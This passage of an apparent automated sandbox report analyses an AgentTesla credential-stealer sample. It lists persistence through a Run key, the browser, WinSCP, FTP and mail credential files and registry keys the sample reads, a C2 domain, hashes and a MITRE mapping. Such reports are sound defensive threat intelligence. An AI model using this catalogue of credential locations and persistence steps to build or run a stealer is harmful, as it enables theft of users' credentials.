Source: Yara match	File source: Process Memory Space: ukBQ4ch2nE.exe PID: 6412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: adobe.exe PID: 1400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: adobe.exe PID: 3000, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\ukBQ4ch2nE.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 5.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ukBQ4ch2nE.exe.4511c80.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ukBQ4ch2nE.exe.4511c80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ukBQ4ch2nE.exe.43db580.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ukBQ4ch2nE.exe.441d5b0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.4036960823.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1786248739.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4036771471.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1782205451.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1579612049.0000000004395000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ukBQ4ch2nE.exe PID: 4576, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ukBQ4ch2nE.exe PID: 6412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: adobe.exe PID: 1400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: adobe.exe PID: 3000, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 5.2.adobe.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ukBQ4ch2nE.exe.4511c80.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ukBQ4ch2nE.exe.4511c80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ukBQ4ch2nE.exe.43db580.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ukBQ4ch2nE.exe.441d5b0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.4036771471.0000000002C5C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1786248739.0000000002F1C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4036960823.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4036960823.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1786248739.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.4036771471.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1782205451.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1579612049.0000000004395000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ukBQ4ch2nE.exe PID: 4576, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ukBQ4ch2nE.exe PID: 6412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: adobe.exe PID: 1400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: adobe.exe PID: 3000, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	1 Exfiltration Over Alternative Protocol	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Registry Run Keys / Startup Folder	112 Process Injection	2 Obfuscated Files or Information	11 Input Capture	24 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	1 Software Packing	1 Credentials in Registry	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Timestomp	NTDS	211 Security Software Discovery	Distributed Component Object Model	11 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	1 Clipboard Data	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	141 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	141 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	112 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Hidden Files and Directories	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ukBQ4ch2nE.exe	75%	Virustotal		Browse
ukBQ4ch2nE.exe	74%	ReversingLabs	Win32.Trojan.Leonem
ukBQ4ch2nE.exe	100%	Avira	HEUR/AGEN.1306767
ukBQ4ch2nE.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\Adobe\adobe.exe	100%	Avira	HEUR/AGEN.1306767
C:\Users\user\AppData\Roaming\Adobe\adobe.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Adobe\adobe.exe	74%	ReversingLabs	Win32.Trojan.Leonem

Source	Detection	Scanner	Label	Link
http://s4.serv00.com	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.ipify.org	104.26.13.205	true	false		high
s4.serv00.com	213.189.52.181	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.ipify.org	ukBQ4ch2nE.exe, 00000001.00000002.1579612049.0000000004395000.00000004.00000800.00020000.00000000.sdmp, ukBQ4ch2nE.exe, 00000002.00000002.4036960823.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.1786248739.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.1782205451.0000000000402000.00000040.00000400.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4036771471.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://account.dyn.com/	ukBQ4ch2nE.exe, 00000001.00000002.1579612049.0000000004395000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.1782205451.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		high
https://api.ipify.org/t	ukBQ4ch2nE.exe, 00000002.00000002.4036960823.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.1786248739.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4036771471.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microsoft	adobe.exe, 00000005.00000002.1798286634.00000000068DA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	ukBQ4ch2nE.exe, 00000002.00000002.4036960823.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.1786248739.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4036771471.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micros	adobe.exe, 00000005.00000002.1798286634.00000000068DA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://s4.serv00.com	ukBQ4ch2nE.exe, 00000002.00000002.4036960823.0000000002A46000.00000004.00000800.00020000.00000000.sdmp, ukBQ4ch2nE.exe, 00000002.00000002.4036960823.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000005.00000002.1786248739.0000000002F1C000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000008.00000002.4036771471.0000000002C5C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.26.13.205	api.ipify.org	United States		13335	CLOUDFLARENETUS	false
213.189.52.181	s4.serv00.com	Poland		57367	ECO-ATMAN-PLECO-ATMAN-PL	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588356
Start date and time:	2025-01-11 01:13:57 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ukBQ4ch2nE.exe renamed because original name is a hash value
Original Sample Name:	edb50e85473329f205f9cde2fca57605b2dcafca75c12c9da52632bfc4249f26.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@9/2@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 250 Number of non-executed functions: 22
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 52.149.20.212, 184.28.90.27, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
01:15:23	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run adobe C:\Users\user\AppData\Roaming\adobe\adobe.exe
01:15:32	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run adobe C:\Users\user\AppData\Roaming\adobe\adobe.exe
19:15:22	API Interceptor	6674819x Sleep call for process: ukBQ4ch2nE.exe modified
19:15:34	API Interceptor	5857560x Sleep call for process: adobe.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.13.205	Yoranis Setup.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	BiXS3FRoLe.exe	Get hash	malicious	TrojanRansom	Browse	api.ipify.org/
	lEUy79aLAW.exe	Get hash	malicious	TrojanRansom	Browse	api.ipify.org/
	Simple1.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	2b7cu0KwZl.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Prismifyr-Install.exe	Get hash	malicious	Node Stealer	Browse	api.ipify.org/
213.189.52.181	Statement of Account - USD 16,720.00.exe	Get hash	malicious	AgentTesla	Browse
	HBL BLJ2T2411809005 & DAJKT2411000812.exe	Get hash	malicious	AgentTesla	Browse
	Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Get hash	malicious	AgentTesla	Browse
	Arrival Notice - BL 713410220035.PDF.exe	Get hash	malicious	AgentTesla	Browse
	BL NBNSA240600050.xlsx.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	DC74433Y7889021.xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PRE ALERT Docs_PONBOM01577.xlsx.exe	Get hash	malicious	AgentTesla	Browse
	Ship Docs YINGHAI-MANE PO 240786.xlsx.exe	Get hash	malicious	AgentTesla	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s4.serv00.com	Statement of Account - USD 16,720.00.exe	Get hash	malicious	AgentTesla	Browse	213.189.52.181
	HBL BLJ2T2411809005 & DAJKT2411000812.exe	Get hash	malicious	AgentTesla	Browse	213.189.52.181
	Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Get hash	malicious	AgentTesla	Browse	213.189.52.181
	Arrival Notice - BL 713410220035.PDF.exe	Get hash	malicious	AgentTesla	Browse	213.189.52.181
	BL NBNSA240600050.xlsx.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	213.189.52.181
	DC74433Y7889021.xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	213.189.52.181
	PRE ALERT Docs_PONBOM01577.xlsx.exe	Get hash	malicious	AgentTesla	Browse	213.189.52.181
	Ship Docs YINGHAI-MANE PO 240786.xlsx.exe	Get hash	malicious	AgentTesla	Browse	213.189.52.181
api.ipify.org	ru52XOQ1p7.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	xJZHVgxQul.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	jG8N6WDJOx.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	HGhGAjCVw5.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	https://glfbanks.com/	Get hash	malicious	HTMLPhisher	Browse	104.26.12.205
	s2Jg1MAahY.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	Y8Q1voljvb.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	IUqsn1SBGy.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	DpTbBYeE7J.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	RJKUWSGxej.exe	Get hash	malicious	AgentTesla, RedLine	Browse	104.26.13.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	yqfze5TKW7.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.112.1
	JGvCEaqruI.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.16.185.241
	VCU262Y2QB.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.16.1
	http://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ==	Get hash	malicious	Unknown	Browse	188.114.97.3
	h1HIe1rt4D.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	http://unikuesolutions.com/ck/bd/%7BRANDOM_NUMBER05%7D/YmVuc29uLmxpbkB2aGFjb3JwLmNvbQ==	Get hash	malicious	Unknown	Browse	104.17.25.14
	http://txto.eu.org/	Get hash	malicious	Unknown	Browse	104.21.16.1
	ru52XOQ1p7.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	tVuAoupHhZ.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
	TjoY7n65om.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
ECO-ATMAN-PLECO-ATMAN-PL	Statement of Account - USD 16,720.00.exe	Get hash	malicious	AgentTesla	Browse	213.189.52.181
	eu6OEBpBCI.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	91.227.41.9
	HBL BLJ2T2411809005 & DAJKT2411000812.exe	Get hash	malicious	AgentTesla	Browse	213.189.52.181
	Amalgamers.exe	Get hash	malicious	AgentTesla	Browse	185.36.171.17
	Statement JULY #U007e SEP 2024 USD 19,055.00.exe	Get hash	malicious	AgentTesla	Browse	213.189.52.181
	9zldYT23H2.elf	Get hash	malicious	Mirai, Gafgyt	Browse	31.186.82.2
	RicevutaPagamento_115538206.dat	Get hash	malicious	Unknown	Browse	128.204.223.111
	http://bdvenlineabanven.serv00.net/	Get hash	malicious	Unknown	Browse	85.194.246.69
	http://entrabdvline.serv00.net/	Get hash	malicious	Unknown	Browse	85.194.246.69
	http://entrabdvline.serv00.net/	Get hash	malicious	Unknown	Browse	85.194.246.69

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	JGvCEaqruI.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.26.13.205
	J4CcLMNm55.exe	Get hash	malicious	Unknown	Browse	104.26.13.205
	J4CcLMNm55.exe	Get hash	malicious	Unknown	Browse	104.26.13.205
	ru52XOQ1p7.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	TjoY7n65om.exe	Get hash	malicious	Snake Keylogger	Browse	104.26.13.205
	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.26.13.205
	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.26.13.205
	4z8Td6Kv8R.exe	Get hash	malicious	Unknown	Browse	104.26.13.205
	4z8Td6Kv8R.exe	Get hash	malicious	Unknown	Browse	104.26.13.205
	cOH7jKmo25.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.26.13.205

Process:	C:\Users\user\Desktop\ukBQ4ch2nE.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	985600
Entropy (8bit):	6.954286746934237
Encrypted:	false
SSDEEP:	12288:TxaMaSzOKy2r7SPNvZlu+RNen3gV8zhcfP7neAs:TYMaSSKy2/SPNLvRNeQV8lcfP7eX
MD5:	74421477FAFAF6BEB9D8E3806E1F6643
SHA1:	44857E574C1892EF8A3F8C8F41C5C0C0AAB20B83
SHA-256:	EDB50E85473329F205F9CDE2FCA57605B2DCAFCA75C12C9DA52632BFC4249F26
SHA-512:	D8C0C0A2945818D8E7ACAC55AF35A53E7352326A7EC28E04EDF5326E7CC5AA2E67983D800DA3E1B7A7A3A6BD3942E5306C7B0037E338A2EF00BE266A7B39C3C2
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....n...............0.................. ... ....@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........$.......J...\|...=l..........................................".(......s..........(C........&.(......".......".(+....VsE...(,...t.........j.(;.....(<....sG...(=....F.~....(J....^...6.~.....(K...F.~....(J....^...6.~.....(K...F.~....(J....^...6.~.....(K...F.~....(J........J.~..........(L...F.~....(J....^...6.~.....(K...F.~....(J........J.~..........(L...R.(M...-..(N.......F.~....(J...t....6.~.....(L...F.~....(J........J.~..........(L...b.(X..

C:\Users\user\AppData\Roaming\Adobe\adobe.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\ukBQ4ch2nE.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.954286746934237
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	ukBQ4ch2nE.exe
File size:	985'600 bytes
MD5:	74421477fafaf6beb9d8e3806e1f6643
SHA1:	44857e574c1892ef8a3f8c8f41c5c0c0aab20b83
SHA256:	edb50e85473329f205f9cde2fca57605b2dcafca75c12c9da52632bfc4249f26
SHA512:	d8c0c0a2945818d8e7acac55af35a53e7352326a7ec28e04edf5326e7cc5aa2e67983d800da3e1b7a7a3a6bd3942e5306c7b0037e338a2ef00be266a7b39c3c2
SSDEEP:	12288:TxaMaSzOKy2r7SPNvZlu+RNen3gV8zhcfP7neAs:TYMaSSKy2/SPNLvRNeQV8lcfP7eX
TLSH:	5C256D483AA018F4C93685F6A8E7853C7A70AD5161E2D42525CF1F9CBDCCF414AE72AF
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....n...............0.................. ... ....@.. .......................`............@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4f1e2e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x9E6E088B [Wed Mar 25 00:27:55 2054 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
